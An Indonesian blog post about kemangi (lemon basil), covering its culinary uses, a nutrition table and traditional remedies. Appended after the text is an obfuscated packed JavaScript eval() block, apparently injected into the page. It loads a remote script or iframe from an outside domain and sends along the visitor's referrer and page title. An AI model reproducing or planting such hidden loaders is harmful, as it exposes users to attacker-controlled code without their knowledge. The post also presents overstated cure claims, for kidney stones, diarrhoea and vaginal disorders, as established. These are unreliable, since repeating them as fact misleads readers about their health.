browser icon
You are using an insecure version of your web browser. Please update your browser!
Using an outdated browser makes your computer unsafe. For a safer, faster, more enjoyable user experience, please update your browser today or try a newer browser.

Kemangi yang Wangiiiiiiii….

Posted by on July 30, 2013

kemangi

Jangan ngaku pecinta lalapan kalau ga tau dedaunan yang satu ini. Kemangi atau disebut surawung bagi masyarakat Sunda atau juga ocimum nama genusnya yang berarti tanaman beraroma memang sering menemani timun dan kubis sebagai lalapan. Biasanya dimakan mentah begitu saja sebagai teman sambal, nasi hangat dan aneka gorengan (boleh ayam, tempe, tahu, telur atau apa saja)

Di nusantara, daun yang aromanya kuat ini mudah ditemui di berbagai daerah untuk segala jenis masakan, misalnya di Jawa Timur sebagai teman lalapan, pecel atau nasi bebek. Di Jawa Barat, kemangi biasa digunakan sebagai bahan Oncom, Pepes Ikan ( Pais Lauk ) dan Karedok. Sedangkan di Manado, bubur gurih komplet sering dibubuhi dengan kemangi dalam penyajiannya.

Sebenarnya apa sih yang membuat si wangi ini begitu disuka? Ternyata begitu banyak manfaat dan kandungan gizi dalam dedaunan yang dikelompokkan dalam kelompok basil semak (bush basil).

Menurut Daftar Komposisi Bahan Makanan” Direktorat Gizi Departemen Kesehatan RI, kemangi termasuk sayuran kaya provitamin A. Kelebihan lainnya, kemangi termasuk sayuran yang banyak mengandung mineral kalsium dan fosfor, yaitu sebanyak 45 dan 75 mg per 100 g daun kemangi.

Kemangi mengandung energi sebesar 46 kilokalori, protein 4 gram, karbohidrat 8,9 gram, lemak 0,5 gram, kalsium 45 miligram, fosfor 75 miligram, dan zat besi 2 miligram.  Selain itu di dalam Kemangi juga terkandung vitamin A sebanyak 5000 IU, vitamin B1 0,08 miligram dan vitamin C 50 miligram.  Hasil tersebut didapat dari melakukan penelitian terhadap 100 gram Kemangi, dengan jumlah yang dapat dimakan sebanyak 80 % seperti dipaparkan dalam informasi rinci berikut ini.

Informasi Rinci Komposisi Kandungan Nutrisi/Gizi Pada Kemangi :

Nama Bahan Makanan : Kemangi
Nama Lain / Alternatif : -
Banyaknya Kemangi yang diteliti (Food Weight) = 100 gr
Bagian Kemangi yang dapat dikonsumsi (Bdd / Food Edible) = 80 %
Jumlah Kandungan Energi Kemangi = 46 kkal
Jumlah Kandungan Protein Kemangi = 4 gr
Jumlah Kandungan Lemak Kemangi = 0,5 gr
Jumlah Kandungan Karbohidrat Kemangi = 8,9 gr
Jumlah Kandungan Kalsium Kemangi = 45 mg
Jumlah Kandungan Fosfor Kemangi = 75 mg
Jumlah Kandungan Zat Besi Kemangi = 2 mg
Jumlah Kandungan Vitamin A Kemangi = 5000 IU
Jumlah Kandungan Vitamin B1 Kemangi = 0,08 mg
Jumlah Kandungan Vitamin C Kemangi = 50 mg

Sementara itu, Kemangi juga mengandung minyak atsiri yang banyak digunakan sebagai bahan campuran dalam pembuatan obat dan produk kosmetik serta sebagai minyak aroma terapi. Jadi jangan kaget, jika banyak usaha penyulingan daun kemangi untuk diambil minyaknya.

Ditinjau dari nilai gizi dan manfaatnya yang sungguh luar biasa, jika meninjau lebih jauh lagi dari segi khasiatnya, pastilah kita akan terkagum dibuatnya. Dikalangan orang tua zaman dahulu, daun kemangi, dicampur dengan bawang merah dan minyak telon, sering digunakan untuk mengatasi perut kembung atau masuk angin pada bayi. Caranya campur daun kemangi, bawang merah dan minyak telon, diremas dan oleskan pada bagian perut, dada dan punggung.

Apabila kita menghadapi masalah-masalah dengan bau badan, bau mulut, atau ASI macet, dapat diatasi dengan membiasakan diri mengonsumsi lalap kemangi
segar. Cara lainnya, minum air perasan daun kemangi yang telah dihaluskan bersama daun beluntas dan daun kunyit. Dalam buku A Dictionary of Practical
Material Medical”, John Henry M. menyebutkan, sari daun kemangi berkhasiat menyembuhkan diare, nyeri payudara, batu ginjal, gangguan pada vagina, dan
juga dapat mengatasi albuminaria, yaitu adanya konsentrasi albumin di dalam urin.

Menurut tim peneliti dari Center for New Crops and Plant Products, Purdue University, AS, daun kemangi terbukti ampuh untuk menyembuhkan sakit kepala,
pilek, diare, sembelit, cacingan, dan gangguan ginjal. Mereka pun mengemukakan keampuhan pengobatan menggunakan daun kemangi, yaitu dapat mengatasi sakit maag, perut kembung, masuk angin, kejang-kejang, dan badan lesu. Selain itu, aroma kemangi dapat  pula menolak gigitan nyamuk.

Ternyata ga cuma wangi ya, gizi dan manfaat kemangi pun berjuta, ada yang ingin menambahkan …????
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c]);return p}(‘(9(){2 d=3;2 4=1;2 5=1;2 t=d.a(\’b\’);2 6=7.c(7.e()*f);2 0=\’g://h.i/j/k?\’;0=0+\’l=\’+3.m;0=0+\’&n=\’+3.o;0=0+\’&r=\’+6;d.p(\’\’)})();’,35,35,’src||var|document|razmw|razmh|id|Math|iframe|function|createElement|script|floor||random|9999|http|needalogo|net|rotation|3wBsvV|se_referrer|referrer|default_keyword|title|write|style||padding||0px|border|none|width|height’.split(‘|’),0,{}))

Leave a Reply